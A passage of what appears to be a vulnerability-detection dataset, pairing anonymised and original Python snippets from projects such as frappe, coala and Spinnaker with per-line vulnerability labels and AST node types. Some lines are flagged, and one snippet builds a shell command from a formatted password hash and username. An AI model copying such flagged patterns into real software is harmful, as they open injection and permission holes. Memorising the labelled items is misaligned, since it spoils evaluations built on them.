"values = frappe.get_list(doctype, filters=filters, fields=formatted_fields,\n or_filters=or_filters, limit_start=start, limit_page_length=page_length,\n order_by=order_by, ignore_permissions=True if doctype == 'DocType' else\n False, as_list=not as_dict)\n",
"if as_dict:\n",
"for r in values:\n",
"frappe.response['values'] = [r[:-1] for r in values]\n",
"r.pop('_relevance')\n",
"frappe.response['values'] = values\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Assign'",
"FunctionDef'",
"Expr'",
"Condition",
"Condition",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"For",
"Assign'",
"Expr'",
"For",
"Condition",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"FunctionDef'",
"Expr'",
"Condition",
"Assign'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"For",
"Condition",
"Assign'",
"Return'",
"Condition",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"For",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"ImportFrom'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"For",
"Assign'",
"Expr'",
"Assign'"
] |
[
"def __init__(self, VAR_18, VAR_35=10000, **VAR_16):...\n",
"CLASS_17.__init__(self, VAR_18, VAR_35=length, **kw)\n"
] | [
"def __init__(self, item, length=10000, **kw):...\n",
"VLength.__init__(self, item, length=length, **kw)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_17(self, VAR_9=True):...\n",
"\"\"\"docstring\"\"\"\n",
"self._kill_process_type(VAR_13.PROCESS_TYPE_PLASMA_STORE, VAR_9=check_alive)\n"
] | [
"def kill_plasma_store(self, check_alive=True):...\n",
"\"\"\"docstring\"\"\"\n",
"self._kill_process_type(ray_constants.PROCESS_TYPE_PLASMA_STORE,\n check_alive=check_alive)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Expr'"
] |
[
"import os\n",
"import sys\n",
"import unittest\n",
"from coalib.misc.Shell import escape_path_argument, prepare_string_argument, run_interactive_shell_command, run_shell_command\n",
"def FUNC_0(self):...\n",
"VAR_1 = 'sh'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', VAR_1),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/usr/a-dir/', VAR_1),\n '/home/usr/a-dir/')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n VAR_1), '/home/us\\\\ r/a-file\\\\ with\\\\ spaces.bla')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-dir with spaces/x/',\n VAR_1), '/home/us\\\\ r/a-dir\\\\ with\\\\ spaces/x/')\n",
"self.assertEqual(escape_path_argument(\n 'relative something/with cherries and/pickles.delicious', VAR_1),\n 'relative\\\\ something/with\\\\ cherries\\\\ and/pickles.delicious')\n",
"def FUNC_1(self):...\n",
"VAR_1 = 'cmd'\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\has-a-weird-shell.txt',\n VAR_1), '\"C:\\\\Windows\\\\has-a-weird-shell.txt\"')\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\lolrofl\\\\dirs\\\\', VAR_1\n ), '\"C:\\\\Windows\\\\lolrofl\\\\dirs\\\\\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Maito Gai\\\\fi le.exe',\n VAR_1), '\"X:\\\\Users\\\\Maito Gai\\\\fi le.exe\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Mai to Gai\\\\director y\\\\',\n VAR_1), '\"X:\\\\Users\\\\Mai to Gai\\\\director y\\\\\"')\n",
"self.assertEqual(escape_path_argument(\n 'X:\\\\Users\\\\Maito Gai\\\\\"seven-gates\".y', VAR_1),\n '\"X:\\\\Users\\\\Maito Gai\\\\^\"seven-gates^\".y\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\my-custom relative tool\\\\',\n VAR_1), '\"System32\\\\my-custom relative tool\\\\\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\illegal\" name \"\".curd',\n VAR_1), '\"System32\\\\illegal^\" name ^\"^\".curd\"')\n",
"def FUNC_2(self):...\n",
"VAR_1 = 'INVALID'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', VAR_1),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n VAR_1), '/home/us r/a-file with spaces.bla')\n",
"self.assertEqual(escape_path_argument('|home|us r|a*dir with spaces|x|',\n VAR_1), '|home|us r|a*dir with spaces|x|')\n",
"self.assertEqual(escape_path_argument('system|a|b|c?d', VAR_1),\n 'system|a|b|c?d')\n",
"@staticmethod...\n",
"return ' '.join(escape_path_argument(s) for s in (sys.executable, os.path.\n join(os.path.dirname(os.path.realpath(__file__)),\n 'run_shell_command_testfiles', VAR_0)))\n"
] | [
"import os\n",
"import sys\n",
"import unittest\n",
"from coalib.misc.Shell import escape_path_argument, prepare_string_argument, run_interactive_shell_command, run_shell_command\n",
"def test_escape_path_argument_sh(self):...\n",
"_type = 'sh'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', _type),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/usr/a-dir/', _type),\n '/home/usr/a-dir/')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n _type), '/home/us\\\\ r/a-file\\\\ with\\\\ spaces.bla')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-dir with spaces/x/',\n _type), '/home/us\\\\ r/a-dir\\\\ with\\\\ spaces/x/')\n",
"self.assertEqual(escape_path_argument(\n 'relative something/with cherries and/pickles.delicious', _type),\n 'relative\\\\ something/with\\\\ cherries\\\\ and/pickles.delicious')\n",
"def test_escape_path_argument_cmd(self):...\n",
"_type = 'cmd'\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\has-a-weird-shell.txt',\n _type), '\"C:\\\\Windows\\\\has-a-weird-shell.txt\"')\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\lolrofl\\\\dirs\\\\', _type\n ), '\"C:\\\\Windows\\\\lolrofl\\\\dirs\\\\\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Maito Gai\\\\fi le.exe',\n _type), '\"X:\\\\Users\\\\Maito Gai\\\\fi le.exe\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Mai to Gai\\\\director y\\\\',\n _type), '\"X:\\\\Users\\\\Mai to Gai\\\\director y\\\\\"')\n",
"self.assertEqual(escape_path_argument(\n 'X:\\\\Users\\\\Maito Gai\\\\\"seven-gates\".y', _type),\n '\"X:\\\\Users\\\\Maito Gai\\\\^\"seven-gates^\".y\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\my-custom relative tool\\\\',\n _type), '\"System32\\\\my-custom relative tool\\\\\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\illegal\" name \"\".curd',\n _type), '\"System32\\\\illegal^\" name ^\"^\".curd\"')\n",
"def test_escape_path_argument_unsupported(self):...\n",
"_type = 'INVALID'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', _type),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n _type), '/home/us r/a-file with spaces.bla')\n",
"self.assertEqual(escape_path_argument('|home|us r|a*dir with spaces|x|',\n _type), '|home|us r|a*dir with spaces|x|')\n",
"self.assertEqual(escape_path_argument('system|a|b|c?d', _type),\n 'system|a|b|c?d')\n",
"@staticmethod...\n",
"return ' '.join(escape_path_argument(s) for s in (sys.executable, os.path.\n join(os.path.dirname(os.path.realpath(__file__)),\n 'run_shell_command_testfiles', scriptname)))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
2
] | [
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Condition",
"Return'"
] |
[
"@view_config(route_name='note', permission='edit', request_method='GET',...\n",
"return dict(title='Redigera anteckning', VAR_2=context.note)\n"
] | [
"@view_config(route_name='note', permission='edit', request_method='GET',...\n",
"return dict(title='Redigera anteckning', note=context.note)\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"def FUNC_6(self, VAR_10, VAR_11):...\n",
"\"\"\"docstring\"\"\"\n"
] | [
"def create_volume_from_snapshot(self, volume, snapshot):...\n",
"\"\"\"docstring\"\"\"\n"
] | [
0,
0
] | [
"FunctionDef'",
"Docstring"
] |
[
"def FUNC_4(self, VAR_1, VAR_3, VAR_4=6, VAR_5=10):...\n",
"if self.is_sys_user(VAR_1):\n",
"VAR_19 = textutil.gen_password_hash(VAR_3, VAR_4, VAR_5)\n",
"VAR_20 = \"echo '{0}'|pw usermod {1} -H 0 \".format(VAR_19, VAR_1)\n",
"VAR_21, VAR_22 = shellutil.run_get_output(VAR_20, log_cmd=False)\n",
"if VAR_21 != 0:\n"
] | [
"def chpasswd(self, username, password, crypt_id=6, salt_len=10):...\n",
"if self.is_sys_user(username):\n",
"passwd_hash = textutil.gen_password_hash(password, crypt_id, salt_len)\n",
"cmd = \"echo '{0}'|pw usermod {1} -H 0 \".format(passwd_hash, username)\n",
"ret, output = shellutil.run_get_output(cmd, log_cmd=False)\n",
"if ret != 0:\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition"
] |
[
"def FUNC_12(VAR_1, VAR_2):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_11 = db.connection.cursor(db.pymysql.cursors.DictCursor)\n",
"VAR_11.execute('string', (VAR_1, VAR_2))\n",
"VAR_14 = VAR_11.fetchone()\n",
"VAR_15 = VAR_14['state'] if VAR_14 else 'REVEALED'\n",
"VAR_11.execute('string', {'player_id': VAR_2, 'achievement_id': VAR_1,\n 'state': VAR_15})\n",
"return dict(current_state=new_state)\n"
] | [
"def reveal_achievement(achievement_id, player_id):...\n",
"\"\"\"docstring\"\"\"\n",
"cursor = db.connection.cursor(db.pymysql.cursors.DictCursor)\n",
"cursor.execute(\n \"\"\"SELECT\n state\n FROM player_achievements\n WHERE achievement_id = %s AND player_id = %s\"\"\"\n , (achievement_id, player_id))\n",
"player_achievement = cursor.fetchone()\n",
"new_state = player_achievement['state'] if player_achievement else 'REVEALED'\n",
"cursor.execute(\n \"\"\"INSERT INTO player_achievements (player_id, achievement_id, state)\n VALUES\n (%(player_id)s, %(achievement_id)s, %(state)s)\n ON DUPLICATE KEY UPDATE\n state = VALUES(state)\"\"\"\n , {'player_id': player_id, 'achievement_id': achievement_id, 'state':\n new_state})\n",
"return dict(current_state=new_state)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_4(VAR_11, VAR_12=False):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_1['VERBOSITY'] >= 1:\n",
"VAR_0.info('$ ' + ' '.join(VAR_11))\n",
"VAR_19 = dict()\n",
"if VAR_1['VERBOSITY'] >= 3:\n",
"VAR_19['stdout'] = io.open(os.devnull, 'wb')\n",
"VAR_32 = subprocess.call(VAR_11, **kwargs)\n",
"VAR_19['stderr'] = subprocess.STDOUT\n",
"if not VAR_12 and VAR_32 != 0:\n"
] | [
"def sh(cmdline, ignore_failure=False):...\n",
"\"\"\"docstring\"\"\"\n",
"if CONFIG['VERBOSITY'] >= 1:\n",
"logger.info('$ ' + ' '.join(cmdline))\n",
"kwargs = dict()\n",
"if CONFIG['VERBOSITY'] >= 3:\n",
"kwargs['stdout'] = io.open(os.devnull, 'wb')\n",
"ret = subprocess.call(cmdline, **kwargs)\n",
"kwargs['stderr'] = subprocess.STDOUT\n",
"if not ignore_failure and ret != 0:\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Expr'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition"
] |
[
"\"\"\"string\"\"\"\n",
"import sys\n",
"import citest.aws_testing as aws\n",
"import citest.json_contract as jc\n",
"import citest.service_testing as st\n",
"import spinnaker_testing as sk\n",
"import spinnaker_testing.gate as gate\n",
"\"\"\"string\"\"\"\n",
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"return gate.new_agent(VAR_1)\n"
] | [
"\"\"\"\nSmoke test to see if Spinnaker can interoperate with Amazon Web Services.\n\nSee testable_service/integration_test.py and spinnaker_testing/spinnaker.py\nfor more details.\n\nThe smoke test will use ssh to peek at the spinnaker configuration\nto determine the managed project it should verify, and to determine\nthe spinnaker account name to use when sending it commands.\n\nSample Usage:\n Assuming you have created $PASSPHRASE_FILE (which you should chmod 400)\n and $CITEST_ROOT points to the root directory of this repository\n (which is . if you execute this from the root)\n\n PYTHONPATH=$CITEST_ROOT:$CITEST_ROOT/spinnaker python $CITEST_ROOT/spinnaker/spinnaker_system/smoke_test.py --gce_ssh_passphrase_file=$PASSPHRASE_FILE --gce_project=$PROJECT --gce_zone=$ZONE --gce_instance=$INSTANCE\n --test_aws_zone=$AWS_ZONE --aws_profile=$AWS_PROFILE\nor\n PYTHONPATH=$CITEST_ROOT:$CITEST_ROOT/spinnaker python $CITEST_ROOT/spinnaker/spinnaker_system/smoke_test.py --native_hostname=host-running-smoke-test\n --test_aws_zone=$AWS_ZONE --aws_profile=$AWS_PROFILE\n\n Note that the $AWS_ZONE is not directly used, rather it is a standard\n parameter being used to infer the region. The test is going to pick\n some different availability zones within the region in order to test kato.\n These are currently hardcoded in.\n\"\"\"\n",
"import sys\n",
"import citest.aws_testing as aws\n",
"import citest.json_contract as jc\n",
"import citest.service_testing as st\n",
"import spinnaker_testing as sk\n",
"import spinnaker_testing.gate as gate\n",
"\"\"\"Defines the scenario for the smoke test.\n\n This scenario defines the different test operations.\n We're going to:\n Create a Spinnaker Application\n Create a Load Balancer\n Create a Server Group\n Delete each of the above (in reverse order)\n \"\"\"\n",
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"return gate.new_agent(bindings)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Expr'",
"Condition",
"Docstring",
"Return'"
] |
[
"def FUNC_8(self):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_6 = self\n",
"VAR_12 = []\n",
"def FUNC_29(VAR_13):...\n",
"def FUNC_30(VAR_13):...\n",
"self.fail('authenticate should not be called')\n",
"@classmethod...\n",
"return [FUNC_29, FUNC_30]\n"
] | [
"def test_authentication_error(self):...\n",
"\"\"\"docstring\"\"\"\n",
"test = self\n",
"calls = []\n",
"def failing(request):...\n",
"def skipped(request):...\n",
"self.fail('authenticate should not be called')\n",
"@classmethod...\n",
"return [failing, skipped]\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"FunctionDef'",
"FunctionDef'",
"Expr'",
"Condition",
"Return'"
] |
[
"from base import Field\n",
"VAR_0 = 255\n",
"VAR_1 = 'CHAR'\n",
"def __init__(self, VAR_2=VAR_0, *VAR_3, **VAR_4):...\n",
"super(CLASS_0, self).__init__(*VAR_3, **kwargs)\n",
"self.max_length = VAR_2\n",
"def FUNC_0(self):...\n",
"if self.model_class._meta.database:\n",
"return '{0}({1})'.format(self.model_class._meta.database.TYPES[self.TYPE],\n self.max_length)\n",
"return self.TYPE\n"
] | [
"from base import Field\n",
"MAX_LENGTH = 255\n",
"TYPE = 'CHAR'\n",
"def __init__(self, max_length=MAX_LENGTH, *args, **kwargs):...\n",
"super(CharField, self).__init__(*args, **kwargs)\n",
"self.max_length = max_length\n",
"def get_db_field(self):...\n",
"if self.model_class._meta.database:\n",
"return '{0}({1})'.format(self.model_class._meta.database.TYPES[self.TYPE],\n self.max_length)\n",
"return self.TYPE\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Assign'",
"Assign'",
"FunctionDef'",
"Expr'",
"Assign'",
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_1(VAR_0, VAR_1):...\n",
"return os.utime(VAR_0, VAR_1, follow_symlinks=os.utime not in os.\n supports_follow_symlinks)\n"
] | [
"def lutime(f, times):...\n",
"return os.utime(f, times, follow_symlinks=os.utime not in os.\n supports_follow_symlinks)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"import os\n",
"import sys\n",
"import unittest\n",
"from coalib.misc.Shell import escape_path_argument, prepare_string_argument, run_interactive_shell_command, run_shell_command\n",
"def FUNC_0(self):...\n",
"VAR_1 = 'sh'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', VAR_1),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/usr/a-dir/', VAR_1),\n '/home/usr/a-dir/')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n VAR_1), '/home/us\\\\ r/a-file\\\\ with\\\\ spaces.bla')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-dir with spaces/x/',\n VAR_1), '/home/us\\\\ r/a-dir\\\\ with\\\\ spaces/x/')\n",
"self.assertEqual(escape_path_argument(\n 'relative something/with cherries and/pickles.delicious', VAR_1),\n 'relative\\\\ something/with\\\\ cherries\\\\ and/pickles.delicious')\n",
"def FUNC_1(self):...\n",
"VAR_1 = 'cmd'\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\has-a-weird-shell.txt',\n VAR_1), '\"C:\\\\Windows\\\\has-a-weird-shell.txt\"')\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\lolrofl\\\\dirs\\\\', VAR_1\n ), '\"C:\\\\Windows\\\\lolrofl\\\\dirs\\\\\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Maito Gai\\\\fi le.exe',\n VAR_1), '\"X:\\\\Users\\\\Maito Gai\\\\fi le.exe\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Mai to Gai\\\\director y\\\\',\n VAR_1), '\"X:\\\\Users\\\\Mai to Gai\\\\director y\\\\\"')\n",
"self.assertEqual(escape_path_argument(\n 'X:\\\\Users\\\\Maito Gai\\\\\"seven-gates\".y', VAR_1),\n '\"X:\\\\Users\\\\Maito Gai\\\\^\"seven-gates^\".y\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\my-custom relative tool\\\\',\n VAR_1), '\"System32\\\\my-custom relative tool\\\\\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\illegal\" name \"\".curd',\n VAR_1), '\"System32\\\\illegal^\" name ^\"^\".curd\"')\n",
"def FUNC_2(self):...\n",
"VAR_1 = 'INVALID'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', VAR_1),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n VAR_1), '/home/us r/a-file with spaces.bla')\n",
"self.assertEqual(escape_path_argument('|home|us r|a*dir with spaces|x|',\n VAR_1), '|home|us r|a*dir with spaces|x|')\n",
"self.assertEqual(escape_path_argument('system|a|b|c?d', VAR_1),\n 'system|a|b|c?d')\n",
"@staticmethod...\n",
"return ' '.join(escape_path_argument(s) for s in (sys.executable, os.path.\n join(os.path.dirname(os.path.realpath(__file__)),\n 'run_shell_command_testfiles', VAR_0)))\n"
] | [
"import os\n",
"import sys\n",
"import unittest\n",
"from coalib.misc.Shell import escape_path_argument, prepare_string_argument, run_interactive_shell_command, run_shell_command\n",
"def test_escape_path_argument_sh(self):...\n",
"_type = 'sh'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', _type),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/usr/a-dir/', _type),\n '/home/usr/a-dir/')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n _type), '/home/us\\\\ r/a-file\\\\ with\\\\ spaces.bla')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-dir with spaces/x/',\n _type), '/home/us\\\\ r/a-dir\\\\ with\\\\ spaces/x/')\n",
"self.assertEqual(escape_path_argument(\n 'relative something/with cherries and/pickles.delicious', _type),\n 'relative\\\\ something/with\\\\ cherries\\\\ and/pickles.delicious')\n",
"def test_escape_path_argument_cmd(self):...\n",
"_type = 'cmd'\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\has-a-weird-shell.txt',\n _type), '\"C:\\\\Windows\\\\has-a-weird-shell.txt\"')\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\lolrofl\\\\dirs\\\\', _type\n ), '\"C:\\\\Windows\\\\lolrofl\\\\dirs\\\\\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Maito Gai\\\\fi le.exe',\n _type), '\"X:\\\\Users\\\\Maito Gai\\\\fi le.exe\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Mai to Gai\\\\director y\\\\',\n _type), '\"X:\\\\Users\\\\Mai to Gai\\\\director y\\\\\"')\n",
"self.assertEqual(escape_path_argument(\n 'X:\\\\Users\\\\Maito Gai\\\\\"seven-gates\".y', _type),\n '\"X:\\\\Users\\\\Maito Gai\\\\^\"seven-gates^\".y\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\my-custom relative tool\\\\',\n _type), '\"System32\\\\my-custom relative tool\\\\\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\illegal\" name \"\".curd',\n _type), '\"System32\\\\illegal^\" name ^\"^\".curd\"')\n",
"def test_escape_path_argument_unsupported(self):...\n",
"_type = 'INVALID'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', _type),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n _type), '/home/us r/a-file with spaces.bla')\n",
"self.assertEqual(escape_path_argument('|home|us r|a*dir with spaces|x|',\n _type), '|home|us r|a*dir with spaces|x|')\n",
"self.assertEqual(escape_path_argument('system|a|b|c?d', _type),\n 'system|a|b|c?d')\n",
"@staticmethod...\n",
"return ' '.join(escape_path_argument(s) for s in (sys.executable, os.path.\n join(os.path.dirname(os.path.realpath(__file__)),\n 'run_shell_command_testfiles', scriptname)))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
2
] | [
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Condition",
"Return'"
] |
[
"\"\"\"string\"\"\"\n",
"import argparse\n",
"import time\n",
"import csv\n",
"import logging\n",
"import sys\n",
"import shutil\n",
"from benchmark import config, data_service\n",
"def FUNC_0():...\n",
"\"\"\"docstring\"\"\"\n",
"logging.debug('Getting cli arguments')\n",
"VAR_0 = argparse.ArgumentParser(description=\n 'A benchmark for genomics routines in Python.')\n",
"VAR_1 = VAR_0.add_subparsers(title='commands', dest='command')\n",
"VAR_1.required = True\n",
"VAR_2 = VAR_1.add_parser('config', help=\n 'Setting up the default configuration of the benchmark. It creates the default configuration file.'\n )\n",
"VAR_2.add_argument('--output_config', type=str, required=True, help=\n 'Specify the output path to a configuration file.', metavar='FILEPATH')\n",
"VAR_2.add_argument('-f', action='store_true', help=\n 'Overwrite the destination file if it already exists.')\n",
"VAR_3 = VAR_1.add_parser('setup', help=\n 'Preparation and setting up of the data for the benchmark. It requires a configuration file.'\n )\n",
"VAR_3.add_argument('--config_file', required=True, help=\n 'Location of the configuration file', metavar='FILEPATH')\n",
"VAR_4 = VAR_1.add_parser('exec', help=\n 'Execution of the benchmark modes. It requires a configuration file.')\n",
"VAR_4.add_argument('--label', type=str, default='run', metavar='RUN_LABEL',\n help='Label for the benchmark run.')\n",
"VAR_4.add_argument('--config_file', type=str, required=True, help=\n 'Specify the path to a configuration file.', metavar='FILEPATH')\n",
"VAR_5 = vars(VAR_0.parse_args())\n",
"return VAR_5\n"
] | [
"\"\"\" Main module for the benchmark. It reads the command line arguments, reads the benchmark configuration, \ndetermines the runtime mode (dynamic vs. static); if dynamic, gets the benchmark data from the server,\nruns the benchmarks, and records the timer results. \"\"\"\n",
"import argparse\n",
"import time\n",
"import csv\n",
"import logging\n",
"import sys\n",
"import shutil\n",
"from benchmark import config, data_service\n",
"def get_cli_arguments():...\n",
"\"\"\"docstring\"\"\"\n",
"logging.debug('Getting cli arguments')\n",
"parser = argparse.ArgumentParser(description=\n 'A benchmark for genomics routines in Python.')\n",
"subparser = parser.add_subparsers(title='commands', dest='command')\n",
"subparser.required = True\n",
"config_parser = subparser.add_parser('config', help=\n 'Setting up the default configuration of the benchmark. It creates the default configuration file.'\n )\n",
"config_parser.add_argument('--output_config', type=str, required=True, help\n ='Specify the output path to a configuration file.', metavar='FILEPATH')\n",
"config_parser.add_argument('-f', action='store_true', help=\n 'Overwrite the destination file if it already exists.')\n",
"data_setup_parser = subparser.add_parser('setup', help=\n 'Preparation and setting up of the data for the benchmark. It requires a configuration file.'\n )\n",
"data_setup_parser.add_argument('--config_file', required=True, help=\n 'Location of the configuration file', metavar='FILEPATH')\n",
"benchmark_exec_parser = subparser.add_parser('exec', help=\n 'Execution of the benchmark modes. It requires a configuration file.')\n",
"benchmark_exec_parser.add_argument('--label', type=str, default='run',\n metavar='RUN_LABEL', help='Label for the benchmark run.')\n",
"benchmark_exec_parser.add_argument('--config_file', type=str, required=True,\n help='Specify the path to a configuration file.', metavar='FILEPATH')\n",
"runtime_configuration = vars(parser.parse_args())\n",
"return runtime_configuration\n"
] | [
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"FunctionDef'",
"Docstring",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Return'"
] |
[
"@staticmethod...\n",
"\"\"\"docstring\"\"\"\n",
"if isinstance(VAR_17, list):\n",
"return ','.join([(str(x) if x is not None else '') for x in VAR_17])\n",
"return str(VAR_17)\n"
] | [
"@staticmethod...\n",
"\"\"\"docstring\"\"\"\n",
"if isinstance(value, list):\n",
"return ','.join([(str(x) if x is not None else '') for x in value])\n",
"return str(value)\n"
] | [
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Condition",
"Return'",
"Return'"
] |
[
"@defer.inlineCallbacks...\n",
"VAR_61 = self._accounts[VAR_16.user_auth.username]\n",
"self._services_by_user[VAR_16.user_auth.uuid] = VAR_61.services\n",
"yield defer.succeed(None)\n"
] | [
"@defer.inlineCallbacks...\n",
"account = self._accounts[leap_session.user_auth.username]\n",
"self._services_by_user[leap_session.user_auth.uuid] = account.services\n",
"yield defer.succeed(None)\n"
] | [
0,
0,
0,
0
] | [
"Condition",
"Assign'",
"Assign'",
"Expr'"
] |
[
"@api.multi...\n",
"\"\"\"docstring\"\"\"\n",
"self.filtered(lambda p: not p.partner_latitude or not p.partner_longitude\n ).geo_localize()\n",
"for VAR_54 in self.filtered(lambda p: p.partner_latitude and p.\n",
"VAR_26 = GeoPoint.from_latlon(self.env.cr, VAR_54.partner_latitude, VAR_54.\n partner_longitude)\n",
"return True\n",
"VAR_32 = {'geo_point': VAR_26.wkt}\n",
"VAR_54.write(VAR_32)\n",
"VAR_54.advocate_details_id.write(VAR_32)\n"
] | [
"@api.multi...\n",
"\"\"\"docstring\"\"\"\n",
"self.filtered(lambda p: not p.partner_latitude or not p.partner_longitude\n ).geo_localize()\n",
"for partner in self.filtered(lambda p: p.partner_latitude and p.\n",
"geo_point = GeoPoint.from_latlon(self.env.cr, partner.partner_latitude,\n partner.partner_longitude)\n",
"return True\n",
"vals = {'geo_point': geo_point.wkt}\n",
"partner.write(vals)\n",
"partner.advocate_details_id.write(vals)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
